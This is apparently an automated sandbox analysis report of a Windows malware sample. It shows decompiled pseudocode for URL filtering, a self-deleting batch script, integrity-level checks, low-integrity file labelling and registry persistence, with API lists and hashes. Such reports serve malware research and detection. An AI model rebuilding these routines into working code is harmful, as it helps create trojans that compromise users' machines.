    							_t172 = E00407BF3( &_v24,  &_v272,  *((intOrPtr*)(_a4 + 0x2c)));
    							_t247 = _t247 + 0x10;
    							L55:
    							if(_t172 > _t217) {
    								_t174 = E00408234(_v24, _t172 + _t172);
    								if( *0x424000 != _t174) {
    									_t64 =  &_v16;
    									 *_t64 = _v16 | 0x00000020;
    									__eflags =  *_t64;
    									 *0x424000 = _t174;
    								} else {
    									E00406E85(_v24);
    									_v24 = _t217;
    								}
    							}
    							_t240 = _a4;
    							L60:
    							if(_v9 != 0xff) {
    								__eflags = _v9 - 1;
    								if(_v9 != 1) {
    									L67:
    									if((_v16 & 0x00000008) == 0) {
    										L93:
    										E00406E85(_v24);
    										_t218 = _v16;
    										if((_t218 & 0x00000001) == 0) {
    											if(E0041AC79(_t230, _t240) != 0) {
    												_t218 = _t218 | 0x00000002;
    											}
    											if((_t218 & 0x00000010) != 0 && E0041B033(_t240, _t230) != 0) {
    												_t218 = _t218 | 0x00000004;
    											}
    										}
    										return _t218;
    									}
    									_t136 =  *(_t240 + 0x28);
    									_t219 = 0;
    									if( *(_t240 + 0x28) != 0) {
    										__eflags = _v16 & 0x00000010;
    										if((_v16 & 0x00000010) == 0) {
    											__eflags =  *(_t240 + 0x20);
    											if( *(_t240 + 0x20) != 0) {
    												L92:
    												_v16 = _v16 & 0xfffffff7;
    												goto L93;
    											}
    											_t233 =  &_v36;
    											_t137 = 0xc;
    											E00405ACA(_t137, _t233);
    											_push(_t233);
    											_push(9);
    											L81:
    											_pop(_t140);
    											_v20 = E004072E3(_t140);
    											L82:
    											if(_v20 == 0) {
    												goto L92;
    											}
    											E00405C85( &_v32);
    											_t144 = E004070C5( *(_t240 + 0xc), 0,  *(_t240 + 8));
    											_t235 = _t144;
    											if(_t144 != 0) {
    												_t230 = 0x3c;
    												E00406F38( &_v160,  &_v160, 0, _t230);
    												_v160 = _t230;
    												if(InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v160) == 1) {
    													_t152 = 0xa;
    													E00405B00(_t152,  &_v272);
    													_t154 = 0xd;
    													E00405B00(_t154,  &_v60);
    													_t227 =  *(_a4 + 0x10);
    													_t156 = 0x404284;
    													_t230 =  ==  ? 0x404284 : _v24;
    													_t244 =  ==  ? 0x404284 : _v32;
    													if(_t227 == 0) {
    														_t227 = "-";
    													}
    													if((_v16 & 0x00000001) != 0) {
    														_t156 =  &_v60;
    													}
    													_push(_v20);
    													_push(_t230);
    													_push(_t244);
    													_push(_t227);
    													_push(_t156);
    													_t161 = E0040ED2D(_t227, _t230, (0 | _v148 == 0x00000004) + 0xb, (0 | _v148 == 0x00000004) + 0xb, _t235, 0,  &_v272, _t235);
    													_t240 = _a4;
    													_t219 = _t161;
    												}
    												E00406E85(_t235);
    											}
    											E00406E85(_v32);
    											E00406E85(_v20);
    											if(_t219 != 0) {
    												goto L93;
    											} else {
    												goto L92;
    											}
    										}
    										_t230 = E004072E3(_t136,  *((intOrPtr*)(_t240 + 0x24)));
    										_v20 = _t230;
    										__eflags = _t230;
    										if(_t230 == 0) {
    											goto L92;
    										}
    										_t163 = 0;
    										__eflags =  *(_t240 + 0x28);
    										if( *(_t240 + 0x28) <= 0) {
    											goto L82;
    										} else {
    											goto L73;
    										}
    										do {
    											L73:
    											_t228 =  *((intOrPtr*)(_t163 + _t230));
    											__eflags = _t228 - 0x26;
    											if(_t228 != 0x26) {
    												__eflags = _t228 - 0x2b;
    												if(_t228 == 0x2b) {
    													 *((char*)(_t163 + _t230)) = 0x20;
    												}
    											} else {
    												 *((char*)(_t163 + _t230)) = 0xa;
    											}
    											_t163 = _t163 + 1;
    											__eflags = _t163 -  *(_t240 + 0x28);
    										} while (_t163 <  *(_t240 + 0x28));
    										goto L82;
    									}
    									_t236 =  &_v36;
    									_t164 = 0xb;
    									E00405ACA(_t164, _t236);
    									_push(_t236);
    									_push(7);
    									goto L81;
    								}
    								L66:
    								_v16 = _v16 | 0x00000008;
    								goto L67;
    							}
    							if( *((char*)(_t240 + 0x18)) != 1 ||  *(_t240 + 0x28) <= _t217) {
    								if((_v16 & 0x00000020) == 0) {
    									goto L67;
    								}
    							}
    							goto L66;
    						}
    					}
    				}
    				_t189 = E0040C9F1( &_v32, _t230, _t254, _t128, 0x4e25, 0x10000000);
    				_t225 = _v32;
    				_v20 = _t189;
    				if(E00407D17(_t189, _v32) == 0) {
    					L37:
    					E00406E85(_v20);
    					_t217 = 0;
    					goto L38;
    				} else {
    					_t239 = _v20;
    					do {
    						_t225 = _t239 + 1;
    						if( *_t225 == 0) {
    							goto L36;
    						}
    						_t194 =  *_t239;
    						if(_t194 == 0x21) {
    							L22:
    							_t239 = _t225;
    							L23:
    							_t230 = 0;
    							_t225 = _t239;
    							if(E0041A956(_t239, 0,  *(_t240 + 8),  *(_t240 + 0xc)) == 0) {
    								goto L36;
    							}
    							_t197 = _t224;
    							if(_t197 == 0) {
    								_v9 = 0;
    								L35:
    								if(_t224 != 2) {
    									goto L37;
    								}
    								goto L36;
    							}
    							_t198 = _t197 - 1;
    							if(_t198 == 0) {
    								L30:
    								_v9 = 1;
    								goto L35;
    							}
    							_t199 = _t198 - 1;
    							if(_t199 == 0) {
    								_t230 = 0x3c;
    								E00406F38( &_v96,  &_v96, 0, 0);
    								_v80 =  &_v536;
    								_v96 = 0;
    								_v76 = 0x103;
    								_t204 = InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v96);
    								__eflags = _t204 - 1;
    								if(_t204 == 1) {
    									__eflags = _v76;
    									if(_v76 > 0) {
    										E00405C3F( &_v536);
    									}
    								}
    								goto L35;
    							}
    							_t207 = _t199 - 1;
    							if(_t207 == 0 || _t207 == 1) {
    								_v16 = _v16 | 0x00000001;
    								goto L30;
    							} else {
    								goto L35;
    							}
    						}
    						if(_t194 == 0x2d) {
    							goto L22;
    						}
    						if(_t194 == 0x40) {
    							goto L22;
    						}
    						if(_t194 == 0x5e) {
    							_t224 = 4;
    							goto L22;
    						} else {
    							_t224 = 0;
    							goto L23;
    						}
    						L36:
    						_t239 = E00407D55(_t239, 1);
    					} while (_t239 != 0);
    					goto L37;
    				}
    			}
    0x0041b31f
    0x0041b315
    0x0041b31b
    0x00000000
    0x0041b317
    0x0041b317
    0x00000000
    0x0041b317
    0x0041b3b2
    0x0041b3bb
    0x0041b3bd
    0x00000000
    0x0041b2f9

    APIs
    • EnterCriticalSection.KERNEL32(00423FE0,-00423E5C,00000000,00423E40), ref: 0041B23C
    • LeaveCriticalSection.KERNEL32(00423FE0), ref: 0041B2BF
    • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 0041B38A
    • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 0041B5C4
      • Part of subcall function 004167D0: CreateMutexW.KERNEL32(004239A0,00000000,00423EF8,?,00000001,?,0040F02D), ref: 004167F8
      • Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
    • String ID: $?B
    • API String ID: 4018265435-754174147
    • Opcode ID: dd2f76f3c2787d40fc5c101cbb5e1fb0dde249eb300f5129a824b73737d03b4c
    • Instruction ID: 736aaa3c121213802786d1d3134a1439edee6384c1233d8a51108f0df5eb9323
    • Opcode Fuzzy Hash: dd2f76f3c2787d40fc5c101cbb5e1fb0dde249eb300f5129a824b73737d03b4c
    • Instruction Fuzzy Hash: 07D1F330E00209AEDF209BA1CC45BEF7BB6EF40304F14856BE855A7291C77CA9D1CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E00408945(void* __ebx, void* __edi, char _a4) {
    				short _v24;
    				intOrPtr _v28;
    				char _v72;
    				short _v592;
    				char _v852;
    				char _v1392;
    				void* _t35;
    				char _t56;
    
    				if(E0040C201(L"bat",  &_v592) == 0) {
    					L7:
    					return 0;
    				}
    				CharToOemW( &_v592,  &_v852);
    				_push( &_v852);
    				if(E00407C49( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
    					L6:
    					E0040C1E0( &_v592);
    					goto L7;
    				}
    				_t35 = E0040C035( &_v592, _a4, _t31);
    				E00406E85(_a4);
    				if(_t35 == 0) {
    					goto L6;
    				}
    				_push(__edi);
    				_push( &_v592);
    				if(E00407B78( &_v592, 0x10e,  &_v1392, L"/c \"%s\"") <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
    					goto L6;
    				} else {
    					_t56 = 0x44;
    					E00406F38( &_v72,  &_v72, 0, _t56);
    					_v24 = 0;
    					_v72 = _t56;
    					_v28 = 1;
    					return E0040874C( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
    				}
    			}

    APIs
      • Part of subcall function 0040C201: GetTempPathW.KERNEL32(000000F6,?), ref: 0040C218
    • CharToOemW.USER32 ref: 00408975
      • Part of subcall function 0040C035: CreateFileW.KERNEL32(0040895F,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0040C274,0040895F,00000000,00000000,0040895F,?), ref: 0040C04F
      • Part of subcall function 0040C035: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040C274,0040895F,00000000,00000000,0040895F,?), ref: 0040C072
      • Part of subcall function 0040C035: CloseHandle.KERNEL32(00000000,?,0040C274,0040895F,00000000,00000000,0040895F,?), ref: 0040C07F
      • Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98
    • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 004089F9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
    • String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
    • API String ID: 1639923935-3344086482
    • Opcode ID: 067c0708d630c08d41bc8b9ba89980e0689973a1f0ae86990dba8657dcb5d2be
    • Instruction ID: 33e426ad9d2ac409e3d0ffb5696a55b6e6f15052de43973c855df06adbfe6d66
    • Opcode Fuzzy Hash: 067c0708d630c08d41bc8b9ba89980e0689973a1f0ae86990dba8657dcb5d2be
    • Instruction Fuzzy Hash: 5A21857190110CAADF10DBA4CD46FEE77ACDB44314F20557BB948F20D1DA789A858F68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00414678(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
    				void* _v8;
    				long _v12;
    				void* _v16;
    				char _v32;
    				void _v360;
    				short _v880;
    				void* __edi;
    				void* __esi;
    				void* _t18;
    				void* _t25;
    				void* _t26;
    				long _t39;
    				void* _t42;
    				void* _t44;
    				long _t47;
    
    				_t48 =  &_v32;
    				_t18 = 0x2b;
    				_v16 = __edx;
    				_t44 = __ecx;
    				E00405B00(_t18,  &_v32);
    				if(E0040C70A(_t48,  &_v880, _t44) == 0) {
    					L11:
    					return 1;
    				}
    				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
    				_v8 = _t25;
    				if(_t25 == 0xffffffff) {
    					goto L11;
    				}
    				_t26 = 0x30;
    				_t39 = 0;
    				E00405ACA(_t26,  &_v360);
    				_t9 =  &_v8; // 0x414660
    				if(WriteFile( *_t9,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
    					L9:
    					FlushFileBuffers(_v8);
    					CloseHandle(_v8);
    					if(_t39 == 0) {
    						E0040C1E0( &_v880);
    					}
    					goto L11;
    				} else {
    					_t42 = _v16;
    					if(_t42 == 0) {
    						L7:
    						_t39 = 1;
    						goto L9;
    					}
    					_t47 = E004079C2(_t42);
    					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
    						_t39 = 0;
    						goto L9;
    					} else {
    						goto L7;
    					}
    				}
    			}

    APIs
      • Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 004146C3
    • WriteFile.KERNEL32(`FA,?,00000146,?,00000000,00000000), ref: 00414701
    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00414725
    • FlushFileBuffers.KERNEL32(?), ref: 00414739
    • CloseHandle.KERNEL32(?), ref: 00414742
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
    • String ID: `FA
    • API String ID: 2459967240-275680183
    • Opcode ID: 60095506ee0e9bd23af9dda3764cb528ca562bd6dbe5ccf2e621adaf1b15f13c
    • Instruction ID: 9de77b7224263c83c391feeb69c15a89e4b88ed9133b3051cf4b630a8498988e
    • Opcode Fuzzy Hash: 60095506ee0e9bd23af9dda3764cb528ca562bd6dbe5ccf2e621adaf1b15f13c
    • Instruction Fuzzy Hash: 5021DE71901118BBCF20DB619E45FDF7BBCAB86310F1040A6A514F71D0D7359A81CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E004085D9(void* __ecx) {
    				long _v8;
    				void* _v12;
    				char* _t21;
    				signed char _t22;
    				DWORD* _t25;
    				void* _t32;
    
    				_t28 = 0;
    				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
    					L14:
    					return _t28;
    				}
    				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
    					L13:
    					CloseHandle(_v12);
    					goto L14;
    				} else {
    					_t32 = E00406E55(_v8);
    					if(_t32 == 0) {
    						L12:
    						goto L13;
    					}
    					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
    						_t21 = GetSidSubAuthorityCount( *_t32);
    						if(_t21 != 0) {
    							_t22 =  *_t21;
    							if(_t22 > 0) {
    								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
    								if(_t25 != 0) {
    									if( *_t25 >= 0x2000) {
    										asm("sbb bl, bl");
    										_t28 = 3;
    									} else {
    										_t28 = 1;
    									}
    								}
    							}
    						}
    					}
    					E00406E85(_t32);
    					goto L12;
    				}
    			}

    APIs
    • OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,004127CC,00000000,00412CA6,?,?,00000000), ref: 004085E9
    • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,74B04EE0,?,?,?,004127CC,00000000,00412CA6,?,?,00000000), ref: 00408609
    • GetLastError.KERNEL32(?,?,?,004127CC,00000000,00412CA6,?,?,00000000), ref: 0040860F
    • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,004127CC,00000000,00412CA6,?,?,00000000), ref: 00408636
    • GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,004127CC,00000000,00412CA6,?,?,00000000), ref: 0040863E
    • GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,004127CC,00000000,00412CA6,?,?,00000000), ref: 00408655
    • CloseHandle.KERNEL32(?,?,?,?,004127CC,00000000,00412CA6,?,?,00000000), ref: 00408680
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
    • String ID:
    • API String ID: 3714493844-0
    • Opcode ID: 6ba548ae53092798021f83af267dca89f57c762e0c5a11566a71ce272a64624e
    • Instruction ID: f5b1dadd1580028ec7ba69aa89cf8f03ebaf4f9cf5e63c4cd5912d0a65ddcbf5
    • Opcode Fuzzy Hash: 6ba548ae53092798021f83af267dca89f57c762e0c5a11566a71ce272a64624e
    • Instruction Fuzzy Hash: 72119035540148BFEB115BA0DE84FBE3B6DDB05340F11097AF481F61A0DB3A9E85ABA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E00413C42(void* _a4, char _a8) {
    				char _v40;
    				char _v160;
    				char _v680;
    				void* __edi;
    				void* __esi;
    				void** _t11;
    				void* _t13;
    				void* _t16;
    				void* _t18;
    				void* _t23;
    				void* _t28;
    				void* _t30;
    				WCHAR* _t34;
    
    				_t11 =  &_a4;
    				_t28 = 0;
    				__imp__ConvertSidToStringSidW(_a4, _t11);
    				if(_t11 != 0) {
    					_t37 =  &_v160;
    					_t13 = 4;
    					E00405B00(_t13,  &_v160);
    					_push(_a4);
    					_t34 =  &_v680;
    					_t16 = E00407B78(_t37, 0x104, _t34, _t37);
    					_pop(_t30);
    					if(_t16 > 0) {
    						_t18 = 5;
    						E00405B00(_t18,  &_v40);
    						_t23 = E0040AFA9(0x80000002, _t30, _t34, _t34,  &_v40, 0x104);
    						if(_t23 != 0 && _t23 != 0xffffffff) {
    							PathUnquoteSpacesW(_t34);
    							_t8 =  &_a8; // 0x4163e3
    							ExpandEnvironmentStringsW(_t34,  *_t8, 0x104);
    							asm("sbb bl, bl");
    							_t28 = 1;
    						}
    					}
    					LocalFree(_a4);
    				}
    				return _t28;
    			}

    APIs
    • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00413C55
    • LocalFree.KERNEL32(?,.exe,00000000), ref: 00413CDD
      • Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE
    • PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,.exe,00000000), ref: 00413CBD
    • ExpandEnvironmentStringsW.KERNEL32(?,cA,00000104), ref: 00413CCA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
    • String ID: .exe$cA
    • API String ID: 2200435814-4092861274
    • Opcode ID: 927c602cd6b40307fbb4b1e268728d14d4bb18f478316434f8f71c5a7e366474
    • Instruction ID: bad26ef6ef1263c8d40d87959d7a2ce828c59dde085bc9040cc76e6066bb3762
    • Opcode Fuzzy Hash: 927c602cd6b40307fbb4b1e268728d14d4bb18f478316434f8f71c5a7e366474
    • Instruction Fuzzy Hash: 9B11A372740114ABDB10AB69DD09FDB3BACEF45360F100026B945F71A0E678EA45CBA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040B39F(short* _a4) {
    				char _v5;
    				int _v12;
    				void* _v16;
    				void* _v20;
    				int _v24;
    				long _t18;
    
    				_v5 = 0;
    				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
    				_t33 = _t18;
    				if(_t18 == 0) {
    					_v12 = 0;
    					do {
    						E0040B204(6, 4, _t33, 2, _a4);
    						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
    							goto L4;
    						} else {
    							RegCloseKey(_v20);
    							if(_v24 == 1) {
    								_v5 = 1;
    							} else {
    								goto L4;
    							}
    						}
    						L7:
    						RegCloseKey(_v16);
    						goto L8;
    						L4:
    						_v12 = _v12 + 1;
    					} while (_v12 < 0x64);
    					goto L7;
    				}
    				L8:
    				return _v5;
    			}

    APIs
    • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 0040B3C7
      • Part of subcall function 0040B204: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0040B325
    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 0040B3F9
    • RegCloseKey.ADVAPI32(?), ref: 0040B402
    • RegCloseKey.ADVAPI32(?), ref: 0040B41C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseCreate$CharUpper
    • String ID: SOFTWARE\Microsoft$d
    • API String ID: 1794619670-1227932965
    • Opcode ID: 7693a883b28b06995ab496e60fbbc0bb7bd75e30fd228a1cb357efaefcc74ca9
    • Instruction ID: 2c515019c25e1e1d069e116a37536aee59250cb8095da9f882965170367ff3f7
    • Opcode Fuzzy Hash: 7693a883b28b06995ab496e60fbbc0bb7bd75e30fd228a1cb357efaefcc74ca9
    • Instruction Fuzzy Hash: B21152B190021CBEEB019B949C80EEFBB7CEB54388F104076F611B2251D3759E458BB9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040E164(WCHAR* __ebx, void* __ecx, char _a4) {
    				void* __edi;
    				long _t3;
    				WCHAR* _t13;
    
    				_t13 = __ebx;
    				if( *0x423348 == 0) {
    					E004131E9(__ecx, 0x423348, 2);
    					 *((short*)(E00406EC1(0x423550, 0x423348, E004079D4(0x423348) + _t10) + 0x423550)) = 0;
    					_t3 = PathRemoveFileSpecW(0x423550);
    				}
    				if(_t13 != 0) {
    					E00407226(_t3 | 0xffffffff, 0x423348, _t13);
    					_t3 = PathRenameExtensionW(_t13, L".tmp");
    				}
    				if(_a4 != 0 &&  *0x423bd4 > 1) {
    					E0040C48C(0x423550);
    					E0040A506(0x423550);
    					_t3 = GetFileAttributesW(0x423348);
    					if(_t3 != 0xffffffff) {
    						return E0040A506(0x423348);
    					}
    				}
    				return _t3;
    			}

    APIs
    • PathRemoveFileSpecW.SHLWAPI(00423550,00423550,00423348,00000000,00000002,00000000,00020000,0040EC5E,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722), ref: 0040E19C
    • PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,0040EC5E,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722,00020000,00000000,?), ref: 0040E1B8
    • GetFileAttributesW.KERNEL32(00423348,00423550,00423550,00000000,00020000,0040EC5E,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722,00020000,00000000), ref: 0040E1DB
      • Part of subcall function 004131E9: PathRenameExtensionW.SHLWAPI(?,.dat,?,004239C8,00000000,00000032,?,77E49EB0,00000000), ref: 00413262
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$ExtensionFileRename$AttributesRemoveSpec
    • String ID: .tmp$H3B$P5B
    • API String ID: 3627892477-3281944230
    • Opcode ID: 5a6240aace92d7e76eaf0a0fe9233108732b342abd6de2ab64eaf25bdb9bde73
    • Instruction ID: ae40f86ead6c6536278a5941d07488a2f58a62d0c6f9d2e450e8db842c3791d2
    • Opcode Fuzzy Hash: 5a6240aace92d7e76eaf0a0fe9233108732b342abd6de2ab64eaf25bdb9bde73
    • Instruction Fuzzy Hash: 02F0A230B0029036E2213B379C4AA7F596D5F82725B14863FB515B62E2CFBC4A9242AD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E0040A506(intOrPtr _a4) {
    				struct _ACL* _v8;
    				struct _SECURITY_DESCRIPTOR* _v12;
    				int _v16;
    				int _v20;
    				void** _t11;
    				int _t16;
    				struct _ACL* _t18;
    
    				_t18 = 0;
    				E00408551(L"SeSecurityPrivilege");
    				_t11 =  &_v12;
    				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
    				if(_t11 != 0) {
    					_v8 = 0;
    					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
    					if(_t16 != 0) {
    						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
    						if(_t16 == 0) {
    							_t18 = 1;
    						}
    					}
    					LocalFree(_v12);
    				}
    				return _t18;
    			}

    APIs
      • Part of subcall function 00408551: GetCurrentThread.KERNEL32 ref: 00408561
      • Part of subcall function 00408551: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00415B4A,SeTcbPrivilege), ref: 00408568
      • Part of subcall function 00408551: OpenProcessToken.ADVAPI32(000000FF,00000020,J[A,?,?,?,?,00415B4A,SeTcbPrivilege), ref: 0040857A
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0040A525
    • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 0040A541
    • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 0040A558
    • LocalFree.KERNEL32(00000000), ref: 0040A567
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
    • String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
    • API String ID: 3555451682-1937014404
    • Opcode ID: 7104e8038013e29fa969d4fcd2453f2d6c3365d1e1111f348ee648a3b5827875
    • Instruction ID: 4272f7f255740fe5622442afaba2600605d7c445861dcd59decfd2094d30ec35
    • Opcode Fuzzy Hash: 7104e8038013e29fa969d4fcd2453f2d6c3365d1e1111f348ee648a3b5827875
    • Instruction Fuzzy Hash: 270119B5640208BFEB019BA08EC5FEE7B7CAB04784F040476B641B21A1D6799A549A28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E0040FC5F(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
    				long _v8;
    				void* __ebx;
    				void* __esi;
    				signed int _t47;
    				signed short _t58;
    				int _t65;
    				signed int _t66;
    				signed short _t75;
    				void* _t79;
    
    				_t70 = __ecx;
    				_push(__ecx);
    				_t75 = _a16;
    				_t79 = __eax;
    				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
    					_t65 = GetAncestor(_a4, 2);
    					if(_t65 ==  *(_t79 + 0x170)) {
    						goto L8;
    					}
    					_t70 = _a12 & 0x0000ffff;
    					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
    					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
    						 *(_t79 + 0x170) = _t65;
    						goto L8;
    					} else {
    						goto L35;
    					}
    				} else {
    					L8:
    					_t66 = _a12 & 0x0000ffff;
    					_v8 = _t66;
    					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
    					if(_a12 != 1) {
    						_t47 = E0040FB80(_t70, _t79, _a4, _a20);
    						_a20 = _t47;
    						__eflags = _t66 - 8;
    						if(__eflags > 0) {
    							__eflags = _t66 - 9;
    							if(__eflags == 0) {
    								__eflags = _t47 - 0xa2;
    								if(_t47 != 0xa2) {
    									__eflags = _t47 - 0xa5;
    									if(_t47 != 0xa5) {
    										L35:
    										return _t47;
    									}
    									_t47 = 0xffff;
    									L59:
    									__eflags = _t47;
    									if(_t47 == 0) {
    										goto L35;
    									}
    									__eflags = _t47 - 0xffff;
    									if(_t47 != 0xffff) {
    										L33:
